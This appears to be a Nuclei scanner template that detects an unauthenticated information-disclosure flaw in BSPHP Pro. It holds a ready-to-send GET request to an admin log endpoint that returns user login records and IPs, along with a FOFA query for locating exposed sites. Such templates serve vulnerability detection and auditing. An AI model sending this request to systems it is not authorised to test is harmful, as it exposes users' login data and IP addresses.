40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: bsphp-info
|
|
|
|
info:
|
|
name: BSPHP - Information Disclosure
|
|
author: ritikchaddha
|
|
severity: low
|
|
description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: title="BSPHP"
|
|
tags: bsphp,info,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{"data":'
|
|
- '"id"'
|
|
- '"user"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220652faa7e1bd008edefb25d6e1cae33738436dfbd246a89837aa135da98d159a90220156ca327bbb5643f27fb67f3e634ee42d882017efe550d46e3e70ebc93c1cefb:922c64590222798bb761d5b6d8e72950 |